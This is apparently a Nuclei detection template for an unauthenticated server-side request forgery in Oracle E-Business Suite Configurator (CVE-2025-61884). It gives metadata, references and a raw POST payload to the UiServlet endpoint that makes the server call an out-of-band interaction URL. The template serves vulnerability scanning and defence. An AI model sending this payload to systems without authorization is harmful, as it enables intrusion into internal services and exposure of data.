id: CVE-2025-61884

info:
  name: Oracle E-Business Suite - Server-Side Request Forgery
  author: Kazgangap
  severity: high
  description: |
    Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.
  impact: |
    Unauthenticated attackers can force the Configurator server to make requests to arbitrary URLs, potentially exposing internal services and sensitive data.
  remediation: |
    Apply the Oracle security patches as described in the Oracle security alert for E-Business Suite.
  reference:
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884
    - https://nvd.nist.gov/vuln/detail/CVE-2025-61884
    - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html
    - https://arcticwolf.com/resources/blog/cve-2025-61884/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-61884
    cwe-id: CWE-918
    epss-score: 0.51081
    epss-percentile: 0.97922
    cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="E-Business Suite"
  tags: cve,cve2025,oracle,e-business,kev,vkev

http:
  - raw:
      - |
        POST /OA_HTML/configurator/UiServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        redirectFromJsp=1&getUiType= {{to_lower(rand_text_alpha(6))}} http://{{interactsh-url}} 0 0 Applet

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "valid_configuration","terminate")'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4b0a00483046022100c6d41a30b8f2d6ad7df690254b35219df3288a6d468a2117fb2a13433c0e9f5b022100e1b5f2337aafa4d9bb6d2990d4df0bd003afd50d5eb15deb500f02e6f68d2e9a:922c64590222798bb761d5b6d8e72950